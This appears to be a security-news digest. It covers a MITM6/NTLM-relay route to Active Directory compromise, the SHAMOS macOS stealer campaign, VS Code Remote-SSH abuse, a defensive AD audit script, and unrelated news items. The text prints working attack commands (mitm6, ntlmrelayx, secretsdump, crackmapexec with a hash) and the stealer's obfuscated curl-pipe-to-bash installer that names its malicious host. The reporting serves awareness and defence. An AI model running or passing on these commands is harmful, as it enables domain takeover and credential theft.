• A sophisticated attack chain that combines MITM6 with NTLM relay techniques to achieve full Active Directory domain compromise. 

    The attack exploits Windows’ default IPv6 auto-configuration behavior, allowing attackers to escalate from network access to Domain Admin privileges in minutes. 

    Key Takeaways
    1. Abuses Windows IPv6 auto-config and AD's 10-machine account quota for domain compromise.
    2. Uses mitm6 + ntlmrelayx to create malicious accounts with RBCD to reach Domain Admin quickly.
    3. Fix: Disable IPv6, set ms-DS-MachineAccountQuota = 0, enable signing, deploy DHCPv6 Guard.

    This technique poses significant risks to organizations running standard Windows environments, as it leverages built-in protocols rather than requiring malware or zero-day exploits.

    IPv6 Auto-Configuration Attack

    Resecurity reports that the MITM6 attack targets a fundamental Windows behavior: automatic DHCPv6 requests sent when systems boot or connect to networks. 

    Even in organizations not actively using IPv6, Windows machines prioritize IPv6 configuration over IPv4, creating an exploitable attack surface.

    Attackers deploy the mitm6 tool to act as a rogue DHCPv6 server, responding to these requests and assigning malicious DNS server addresses to victim machines. 

The command sudo mitm6 -d target.local --no-ra establishes the attacker as the authoritative DNS server for the target domain.

[Figure: Attack chain]

    The attack chain continues with ntlmrelayx from the Impacket toolkit, which intercepts NTLM authentication attempts through WPAD (Web Proxy Auto-Discovery Protocol) spoofing. 

The tool executes: sudo impacket-ntlmrelayx -ts -6 -t ldaps://target.local -wh fakewpad --add-computer --delegate-access, creating malicious computer accounts and configuring Resource-Based Constrained Delegation (RBCD).

“Active Directory’s default ms-DS-MachineAccountQuota setting allows any authenticated user to add up to 10 machine accounts, enabling attackers to create controlled computer objects,” reads the report.

    These accounts can then modify their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, allowing impersonation of privileged accounts, including Domain Administrators.

    Recommendations

The attack’s impact extends far beyond initial network compromise. Once successful, attackers can extract NTLM hashes using secretsdump.py "target.local/User:Password@target.local" and conduct lateral movement with tools like CrackMapExec: crackmapexec smb 10.0.0.1/8 -u administrator -H 1f937b21e2e0ada0d3d3f7cf58c8aade --share.

[Figure: Take Control of Compromised Machines]

    Organizations face severe consequences, including full domain compromise, credential theft, service disruption, and potential data exfiltration. 

    The attack’s stealthy nature makes detection challenging, as it abuses legitimate Windows protocols.

    Critical mitigation strategies include disabling IPv6 when not required, setting ms-DS-MachineAccountQuota = 0 to prevent unauthorized computer account creation, and enforcing SMB and LDAP signing to prevent relay attacks. 

    Network-level defenses should implement DHCPv6 Guard on switches and routers to block unauthorized IPv6 advertisements.
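The three Active Directory settings named above can be audited from a domain-joined host. The following PowerShell script is an added example written for this digest; it is not code from the article or from the Resecurity report. It assumes the ActiveDirectory RSAT module is installed and the caller can read the domain object; the -Enforce switch and the seven-day window for new computer accounts are choices of this script, not AD parameters. DHCPv6 Guard is a switch/router configuration and is out of scope here.

```powershell
# Added example: audit (and optionally harden) the AD settings the MITM6 + ntlmrelayx chain relies on.
# Assumptions: ActiveDirectory RSAT module present; run as a user who can read the domain object.
# -Enforce is a switch of this script (hypothetical), not an AD cmdlet parameter.
[CmdletBinding()]
param(
    [switch]$Enforce   # set ms-DS-MachineAccountQuota to 0 instead of only reporting it
)

Import-Module ActiveDirectory

$domainDn = (Get-ADDomain).DistinguishedName

# 1. Machine account quota: the chain needs a non-zero quota (default 10) to add a computer account.
$quota = (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($quota -ne 0) {
    Write-Warning "ms-DS-MachineAccountQuota is $quota: any authenticated user may create $quota computer accounts."
    if ($Enforce) {
        Set-ADDomain -Identity $domainDn -Replace @{ 'ms-DS-MachineAccountQuota' = 0 }
        Write-Host 'ms-DS-MachineAccountQuota set to 0.'
    }
} else {
    Write-Host 'ms-DS-MachineAccountQuota is 0 (hardened).'
}

# 2. Recently created computer accounts (ntlmrelayx --add-computer leaves one behind).
#    The 7-day window is an arbitrary choice for this example.
$since = (Get-Date).AddDays(-7)
Write-Host "`nComputer accounts created since $since:"
Get-ADComputer -Filter { whenCreated -ge $since } -Properties whenCreated |
    Select-Object Name, whenCreated |
    Format-Table -AutoSize

# 3. Computers with RBCD configured (msDS-AllowedToActOnBehalfOfOtherIdentity populated).
#    Legitimate entries are rare; one that names a freshly created computer account is a strong indicator.
Write-Host 'Computers with msDS-AllowedToActOnBehalfOfOtherIdentity set:'
Get-ADComputer -Filter 'msDS-AllowedToActOnBehalfOfOtherIdentity -like "*"' `
    -Properties msDS-AllowedToActOnBehalfOfOtherIdentity, PrincipalsAllowedToDelegateToAccount |
    ForEach-Object {
        [PSCustomObject]@{
            Target      = $_.Name
            AllowedFrom = ($_.PrincipalsAllowedToDelegateToAccount -join ', ')
        }
    } | Format-Table -AutoSize

# 4. Signing requirements on this host. LDAP server signing is read on a domain controller
#    (LDAPServerIntegrity: 2 = required); SMB server signing applies to any Windows server
#    (RequireSecuritySignature: 1 = required). Relay to ldaps:// also needs channel binding, not checked here.
$ldap = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters' `
            -Name LDAPServerIntegrity -ErrorAction SilentlyContinue
$smb  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters' `
            -Name RequireSecuritySignature -ErrorAction SilentlyContinue

$ldapState = if ($null -eq $ldap) { 'not a DC / not set' } elseif ($ldap.LDAPServerIntegrity -eq 2) { 'required' } else { 'NOT required' }
$smbState  = if ($null -eq $smb)  { 'not set' } elseif ($smb.RequireSecuritySignature -eq 1) { 'required' } else { 'NOT required' }

Write-Host "LDAP server signing: $ldapState"
Write-Host "SMB server signing:  $smbState"
```

Run it without -Enforce first to see the current quota, new computer objects and RBCD entries; re-run with -Enforce to zero the quota. Signing should be enforced through Group Policy rather than by editing these registry values directly, but reading them is a quick check that the policy has applied.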

    This attack demonstrates how default configurations can create significant security vulnerabilities, emphasizing the need for proactive hardening of Active Directory environments and continuous monitoring for rogue network services.


    The post New MITM6 + NTLM Relay Attack Let Attackers Escalate Privileges and Compromise Entire Domain appeared first on Cyber Security News.


  • A sophisticated malware campaign targeting macOS users has emerged between June and August 2025, successfully attempting to compromise over 300 customer environments through deceptive help websites.

    The malicious operation deploys SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER who operates this information stealer as malware-as-a-service for rent to other cybercriminals.

    The attack begins when unsuspecting users search for common macOS troubleshooting solutions, such as “macos flush resolver cache,” only to encounter promoted malvertising websites in their search results.

    These fraudulent sites, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent.

    The campaign has targeted users across multiple countries including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.

    CrowdStrike researchers identified that the threat actors exploit a sophisticated social engineering approach by presenting victims with seemingly helpful instructions for resolving their technical issues.

    However, these instructions contain a critical deception: victims are instructed to execute a malicious one-line terminal command that initiates the malware installation process.

    Search engine results with promoted malvertising website (Source – CrowdStrike)

    The researchers noted that one Google Advertising profile promoting these spoofed websites appears to impersonate a legitimate Australia-based electronics store, suggesting advanced identity spoofing techniques.

    Google advertising profile (Source – CrowdStrike)

    Infection Mechanism and Technical Implementation

The malware’s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:

    "curl -fsSL" $ ("echo" "aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo" | "base64 -d") | "bash"

    This command performs several critical operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https://icloudservers.com/gm/install[.]sh, then downloads and executes a Bash script from this malicious server.

    The script captures the user’s password and subsequently downloads the SHAMOS Mach-O executable from https://icloudservers.com/gm/update.

    Once installed in the /tmp/ directory, SHAMOS employs multiple evasion techniques to avoid detection.

    The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment.

    The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.

    SHAMOS specifically targets cryptocurrency wallet files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information.

    The malware packages stolen data into a ZIP archive named “out.zip” and exfiltrates it using curl commands to remote servers.

Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the user’s LaunchDaemons directory when sudo privileges are available.


    The post New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials appeared first on Cyber Security News.


  • Federal authorities have charged a 22-year-old Oregon man with operating one of the most powerful distributed denial-of-service (DDoS) botnets ever discovered, marking a significant victory in the ongoing battle against cybercriminal infrastructure. Ethan Foltz of Eugene, Oregon, faces federal charges for allegedly developing and administering the “Rapper Bot” DDoS-for-hire service, which has been conducting large-scale […]

    The post 22-year-old Operator of ‘Rapper Bot’ Botnet Charged for Launching 3 Tbps DDoS Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A critical security vulnerability has been discovered in Microsoft’s VS Code Remote-SSH extension that allows attackers to execute malicious code on developers’ local machines through compromised remote servers. 

    Security researchers have demonstrated how this attack, dubbed “Vibe Hacking,” exploits the inherent trust relationship between remote development environments and local machines, affecting both VS Code and popular forks like Cursor.

    The vulnerability stems from a dangerous misconception among developers who believe remote development environments provide complete isolation. 

    Key Takeaways
    1. VS Code Remote-SSH extension allows attackers to execute malicious code on developers' local machines.
    2. Attackers use built-in commands to open local terminals and automatically run arbitrary code.
    3. Developers expose their workstations to compromise when connecting to untrusted servers.

    However, once a server is compromised, attackers can easily pivot to the developer’s local machine through the Remote-SSH extension’s built-in functionality.

    Exploiting Built-in Commands

    Calif reports that the attack leverages two specific VS Code commands that operate within the default configuration settings. 

    Malicious extensions on compromised servers can execute the workbench.action.terminal.newLocal command to open a terminal directly on the developer’s local machine, bypassing the remote environment entirely.

[Figure: Attack Chain]

    Once the local terminal is established, attackers deploy the workbench.action.terminal.sendSequence command to send arbitrary text sequences to the terminal. 

By appending a newline character, the malicious code executes automatically as if the developer pressed Enter. This technique effectively transforms the trusted development environment into a command-and-control channel, reads the report.

    The attack works seamlessly because the Remote-SSH extension inherently trusts communications from the remote server. 

    When developers connect to what they believe is an isolated sandbox environment, they unknowingly expose their local machines to potential compromise.

    Mitigation Strategies

    Microsoft has acknowledged these risks on the Remote-SSH extension marketplace page, warning that “a compromised remote could use the VS Code Remote connection to execute code on your local machine”. 

    However, this warning has not prevented widespread adoption of remote development practices, particularly for AI agent deployment and testing.

    Security researchers suggest implementing user approval mechanisms when remote extensions attempt to open local terminals or send keystrokes to active terminals. 

    Monitoring the ~/.cursor-server directory for unauthorized changes can provide limited protection, though this approach offers minimal security if servers are fully compromised.

    The vulnerability highlights the need for secure-by-default designs in development tools that don’t rely on users making complex trust decisions. 

    As remote development continues growing in popularity, addressing these fundamental security issues becomes increasingly critical for protecting developer workstations from sophisticated supply chain attacks.


    The post Microsoft VS Code Remote-SSH Extension Hacked to Execute Malicious Code on Developer’s Machine appeared first on Cyber Security News.


  • The Cybersecurity and Infrastructure Security Agency (CISA) released four critical Industrial Control Systems (ICS) advisories on August 19, 2025, alerting organizations to current security vulnerabilities and potential exploits affecting critical infrastructure systems. These advisories provide essential information for administrators and security professionals managing industrial control environments. Critical Systems Under Advisory The four newly released advisories […]

    The post CISA Issues Four ICS Advisories on Vulnerabilities and Exploits appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A 20-year-old member of the notorious cybercrime gang known as Scattered Spider has been sentenced to ten years in prison in the U.S. in connection with a series of major hacks and cryptocurrency thefts. Noah Michael Urban pleaded guilty to charges related to wire fraud and aggravated identity theft back in April 2025. News of Urban’s sentencing was reported by Bloomberg and Jacksonville news


  • Apple has issued an emergency security update for iOS 18.6.2 and iPadOS 18.6.2 to address a critical zero-day vulnerability that the company confirms is being actively exploited in sophisticated attacks against targeted individuals. The update, released on August 20, 2025, patches a severe flaw in the ImageIO component that could allow attackers to execute malicious […]

    The post Apple Confirms Critical 0-Day Under Active Attack – Immediate Update Urged appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A critical XML External Entity (XXE) vulnerability has been discovered in Apache Tika’s PDF parser module, potentially allowing attackers to access sensitive data and compromise internal systems. The flaw, tracked as CVE-2025-54988, affects a wide range of Apache Tika deployments and has prompted immediate security advisories from the Apache Software Foundation. Field Value CVE ID […]

    The post Critical Flaw in Apache Tika PDF Parser Exposes Sensitive Data to Attackers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild. The zero-day out-of-bounds write vulnerability, tracked as CVE-2025-43300, resides in the ImageIO framework that could result in memory corruption when processing a malicious image. “Apple is aware of a report that this issue may have been


  • The Air Force wants industry to make an identical copy of the Shahed-136 drone, used by Russia in relentless attacks on Ukraine, to develop and test defenses against the Iranian-designed system.

    The service wants to buy 16 of these Shahed look-alikes, with an option to buy 20 more later, as it pursues the “next generation” of counter-drone programs, according to a request for information posted last week.

    “To support weapons development and integration of these weapon systems, the [U.S. government] requires that the Class 3 unmanned aerial target system be a 1:1 copy (form, fit and function) of a reverse engineered Shahed-136 suicide drone,” the solicitation said. 

    The drone must be an “exact replica” of the Iranian bird with the same profile, shape, payload capacity—about 70 to 100 pounds—and must be able to fly at least 50 miles, according to the solicitation. That’s far less than the Shahed’s range of over a thousand miles, but sufficient for testing purposes.

    Designed in Iran, modified and mass-produced under license by Russia, the Shahed-136 has emerged as a favorite weapon of the invading forces inside Ukraine. Their price tag is estimated at $30,000 to $40,000 apiece, a fraction of the cost of the U.S. and European missiles used to take them down. That imbalance, plus depleted stockpiles of interceptors, has Ukraine and its supporters hunting for cheaper defenses.

    Several U.S. firms have already started designing Shahed-esque offerings for the Pentagon. During a drone demo event at the Pentagon last month, SpektreWorks, an Arizona-based drone manufacturer, showed off its new Low-Cost Uncrewed Combat Attack System, dubbed LUCAS, that can emulate a Shahed. Another firm, Alabama-based Griffon Aerospace, recently unveiled the MQM-172 Arrowhead, marketed as both an attack and target drone.

    While the Air Force provided some guidelines in the solicitation, the government said it won’t provide a technical data package for this requirement, so companies must be able to design and develop their own copy. 

    The solicitation notes that the drone will be sent to the service’s armament directorate, which develops weapons at Eglin Air Force Base in Florida.
